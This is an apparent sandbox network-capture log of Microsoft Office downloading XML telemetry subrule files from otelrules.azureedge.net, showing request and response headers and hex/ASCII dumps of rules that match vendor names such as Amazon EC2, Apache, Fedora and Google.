                                2024-12-03 16:51:28 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                Session IDSource IPSource PortDestination IPDestination Port
                                46192.168.2.55001313.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:28 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:28 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:28 GMT
                                Content-Type: text/xml
                                Content-Length: 475
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                ETag: "0x8DC582BB2BE84FD"
                                x-ms-request-id: 2c2c8243-201e-006e-2a02-45bbe3000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165128Z-174f7845968cs2nkhC1EWR2tq000000001vg00000000h2yc
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:28 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                47192.168.2.55001413.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:28 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:29 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:29 GMT
                                Content-Type: text/xml
                                Content-Length: 448
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                ETag: "0x8DC582BB389F49B"
                                x-ms-request-id: e14f358b-d01e-007a-5d7e-3ff38c000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165129Z-174f78459684bddphC1EWRbht4000000161g000000000p7d
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:29 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                Session IDSource IPSource PortDestination IPDestination Port
                                48192.168.2.55001613.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:29 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:30 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:29 GMT
                                Content-Type: text/xml
                                Content-Length: 416
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                ETag: "0x8DC582BAEA4B445"
                                x-ms-request-id: 3fc8ca9f-401e-0083-6c91-3f075c000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165129Z-174f7845968xr5c2hC1EWRd0hn0000000r1000000000gqy1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:30 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                Session IDSource IPSource PortDestination IPDestination Port
                                49192.168.2.55001513.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:29 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:30 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:29 GMT
                                Content-Type: text/xml
                                Content-Length: 491
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                ETag: "0x8DC582B98B88612"
                                x-ms-request-id: 22106228-c01e-007a-5d36-40b877000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165129Z-174f7845968zgtf6hC1EWRqd8s0000000z6000000000avxz
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:30 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                50192.168.2.55001713.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:30 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:31 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:30 GMT
                                Content-Type: text/xml
                                Content-Length: 479
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                ETag: "0x8DC582B989EE75B"
                                x-ms-request-id: 83b34a83-b01e-0053-35ab-42cdf8000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165130Z-174f7845968zgtf6hC1EWRqd8s0000000z8g000000000m9g
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:31 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                51192.168.2.55001813.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:30 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:31 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:30 GMT
                                Content-Type: text/xml
                                Content-Length: 415
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                ETag: "0x8DC582BA80D96A1"
                                x-ms-request-id: 9d60b28b-101e-0017-33c7-4347c7000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165130Z-174f7845968jrjrxhC1EWRmmrs00000016dg000000004kmz
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:31 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                Session IDSource IPSource PortDestination IPDestination Port
                                52192.168.2.55001913.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:31 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:32 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:32 GMT
                                Content-Type: text/xml
                                Content-Length: 471
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                ETag: "0x8DC582B97E6FCDD"
                                x-ms-request-id: e98b0d1a-601e-000d-7eee-442618000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165132Z-174f7845968j6t2phC1EWRcfe800000016eg000000002esf
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:32 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                53192.168.2.55002113.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:32 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:32 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:32 GMT
                                Content-Type: text/xml
                                Content-Length: 477
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                ETag: "0x8DC582BA54DCC28"
                                x-ms-request-id: 7af319f3-d01e-0017-6a91-3fb035000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165132Z-174f7845968zgtf6hC1EWRqd8s0000000z3g00000000ne1x
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:32 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                54192.168.2.55002013.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:32 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:33 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:32 GMT
                                Content-Type: text/xml
                                Content-Length: 419
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                ETag: "0x8DC582B9C710B28"
                                x-ms-request-id: 5cf18767-601e-000d-7d91-3f2618000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165132Z-174f78459685726chC1EWRsnbg000000167g00000000gpy1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:33 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                Session IDSource IPSource PortDestination IPDestination Port
                                55192.168.2.55002213.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:33 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:34 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:34 GMT
                                Content-Type: text/xml
                                Content-Length: 419
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                ETag: "0x8DC582BB7F164C3"
                                x-ms-request-id: dd02da03-701e-001e-0d91-3ff5e6000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165134Z-174f7845968cdxdrhC1EWRg0en000000163000000000qb0n
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:34 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                Session IDSource IPSource PortDestination IPDestination Port
                                56192.168.2.55002313.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:34 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:34 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:34 GMT
                                Content-Type: text/xml
                                Content-Length: 477
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                ETag: "0x8DC582BA48B5BDD"
                                x-ms-request-id: b1291b2a-001e-0028-31ae-43c49f000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165134Z-174f7845968cpnpfhC1EWR3afc00000015w0000000008hau
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:34 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


